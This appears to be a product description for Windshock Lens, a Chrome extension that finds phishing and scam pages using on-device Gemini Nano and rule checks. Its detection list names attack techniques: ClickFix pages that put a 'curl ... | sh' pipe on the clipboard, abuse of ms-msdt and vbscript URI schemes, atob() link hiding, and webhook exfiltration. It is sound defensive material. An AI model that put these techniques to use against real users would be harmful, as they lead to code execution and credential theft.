Windshock Lens

Private, on-device scam and phishing analysis for your browser. Chrome built-in Gemini Nano + deterministic security rules.

Windshock Lens triages suspicious links and pages directly inside Chrome — before you click, before the page steals credentials, before a malicious download lands on disk. It is built for the gray zone that Chrome Safe Browsing and standard endpoint security tools miss: zero-hour brand-impersonation pages on free hosting platforms (workers.dev, pages.dev, firebaseapp.com, vercel.app, …), AI-client lookalikes, fake software download pages, and ClickFix shell-payload tricks. How it works Windshock Lens combines four independent signal layers: 1. Browser-side page extraction — the DOM, forms, links, clipboard writes, and downloads triggered by the target page are collected without sending the page anywhere. 2. On-device Gemini Nano LLM — Chrome's built-in language model evaluates the extracted signals locally. Page content, URLs, and OCR text never reach an external LLM API. 3. Deterministic security rules — hard evidence (shell payload on clipboard, dangerous URI schemes, auto-downloads, phishing-kit fingerprints) yields a verdict without the LLM. Brand-to-domain mismatch overrides catch impersonation patterns the LLM misses. 4. Ownership corroboration — RDAP + Certificate Transparency lookups for the target domain confirm or contradict the LLM's brand identification. What it actually catches - Brand-mimic pages on workers.dev / pages.dev / firebaseapp.com / appspot.com hosting - ClickFix attacks that paste curl ... | sh into your clipboard via fake "verify you are human" buttons - AppleScript / ms-msdt / vbscript URI scheme abuse - Phishing kits using clearbit logos, screenshotmachine, atob() URL hiding, Telegram/Discord webhook exfiltration - Auto-downloads of executable installers from phishing-hosted pages — the download is paused, the host is scanned, then cancelled and erased if phishing What stays on your device - Page content, URLs, OCR text — processed only by the local Gemini Nano model - Bookmarks, history, top sites — read only, never transmitted (used to mark sites you already trust) - Verdicts and denylist hashes — stored in chrome.storage local to your profile What leaves your device - The bare domain name of each scanned host goes to public WHOIS / RDAP / Certificate Transparency services (yesnic / rdap.org / crt.sh) to verify domain ownership. No page content, no path, no query string, no user identity. Requirements - Chrome 138 or later - Gemini Nano on-device model (~2 GB, one-time download). Enable at chrome://on-device-internals. Full privacy policy: https://github.com/windshock/lens/blob/main/docs/privacy.md Source code and issue tracker: https://github.com/windshock/lens